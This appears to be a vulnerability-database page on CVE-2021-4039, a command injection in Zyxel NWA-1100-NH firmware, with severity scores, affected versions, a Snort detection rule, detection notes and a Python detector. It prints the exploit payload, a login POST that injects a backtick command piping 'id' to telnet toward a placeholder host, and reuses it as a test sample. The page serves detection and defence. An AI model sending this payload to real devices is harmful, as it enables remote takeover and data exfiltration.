cbcvebase.
CVE-2021-4039
published 2022-03-01

CVE-2021-4039: A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.

Priority: P1 · 91 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW exploit · VulnCheck KEV
Exploited in the wild
EPSS: 71.05% (99.3th percentile)

Affected (2 ranges)

Vendor | Product | Version range | Fixed in
zyxel | nwa1100-nh_firmware | < 2.12(aasi.3)c0 | 2.12(aasi.3)c0
zyxel | nwa1100-nh_firmware | |

Detection & IOCs (extracted from sources)

url: /login/login.html
port: 8081
command: myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login
snort:
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Zyxel NWA-1100-NH Command Injection Attempt (CVE-2021-4039)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:17; content:"/login/login.html"; fast_pattern; http.request_body; content:"myname="; content:"mypasswd="; content:"Submit=Login"; pcre:"/myname=[^&]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/i"; reference:url,www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:url,www.exploit-db.com/exploits/50870; reference:cve,2021-4039; classtype:attempted-admin; sid:2036737; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_06_01, cve CVE_2021_4039, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_26, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • Exploit targets POST requests to /login/login.html on port 8081 with shell metacharacters (backtick, semicolon, pipe, ampersand) injected into the `myname` parameter of the login form body.
  • Detect injection by inspecting the `myname` POST body field for URL-encoded or raw shell metacharacters: %60 (backtick), %3b (semicolon), %7c (pipe), %26 (ampersand), as well as command substitution patterns like $( or <(.
  • The exploit payload uses backtick-enclosed OS commands (e.g., `id|telnet yourserverhere 21`) to achieve out-of-band command execution via a reverse telnet connection, which can be used as a callback indicator.
  • The ET rule (sid:2036737) requires all three body tokens — myname=, mypasswd=, and Submit=Login — to be present simultaneously, reducing false positives while matching the exact login form structure.
  • URI match should enforce exact byte size of 17 for /login/login.html to avoid matching longer paths that merely contain this string.
  • The ET rule is tagged for Perimeter and SSLDecrypt deployments, meaning it will miss exploitation attempts over HTTPS unless TLS inspection is enabled.
  • All firmware versions before 2.12 are affected; patched version is NWA1100-NH_2.12(AASI.3)C0.
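As an added example (not code from this page, from the ET rule's authors, or from Zyxel), the field-level check described in the detection notes above, written in Python: the request must be a POST to exactly /login/login.html with all three form tokens present, and the decoded myname value is then inspected for shell metacharacters and substitution openers. The raw request samples, the host 192.0.2.10 and the helper names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Indicators from the detection notes: raw shell metacharacters in the
# decoded value, plus the command-substitution openers $( <( >(
METACHARS = set("`;|&")
SUBSTITUTION = re.compile(r"[$<>]\(")

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, uri, body); minimal parser for the samples."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) < 2:
        return None, None, ""
    return parts[0], parts[1], body.decode("latin-1")

def myname_values(body: str):
    """Yield decoded myname= value(s). The body is split on '&' before decoding,
    so the '&' that delimits the next parameter is never read as part of the value."""
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        if name == "myname":
            yield unquote_plus(value)

def is_cve_2021_4039_attempt(raw: bytes) -> bool:
    method, uri, body = parse_request(raw)
    if method != "POST" or uri != "/login/login.html":  # exact path, as bsize:17 enforces
        return False
    if not all(tok in body for tok in ("myname=", "mypasswd=", "Submit=Login")):
        return False
    return any(METACHARS & set(v) or SUBSTITUTION.search(v) for v in myname_values(body))

def _request(path: str, body: str) -> bytes:
    """Build a constructed sample request to the port named on this page (8081)."""
    return (f"POST {path} HTTP/1.1\r\nHost: 192.0.2.10:8081\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n\r\n{body}").encode()

# Constructed samples: the page's payload, a benign login, a $( variant, and a wrong path.
PAYLOAD = "myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login"
EXPLOIT = _request("/login/login.html", PAYLOAD)
BENIGN = _request("/login/login.html", "myname=admin&mypasswd=s3cret&Submit=Login")
SUBST = _request("/login/login.html", "myname=a%24%28id%29&mypasswd=x&Submit=Login")
WRONG_PATH = _request("/login/login.html.bak", PAYLOAD)

if __name__ == "__main__":
    for label, req in [("exploit", EXPLOIT), ("benign", BENIGN), ("subst", SUBST), ("path", WRONG_PATH)]:
        print(label, is_cve_2021_4039_attempt(req))
```

Because the value is isolated before decoding, a benign login whose myname is followed by &mypasswd= is not flagged, while the percent-encoded backtick, pipe and $( forms are.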

CVSS provenance

nvd (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd (v2.0): 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck: 9.8 CRITICAL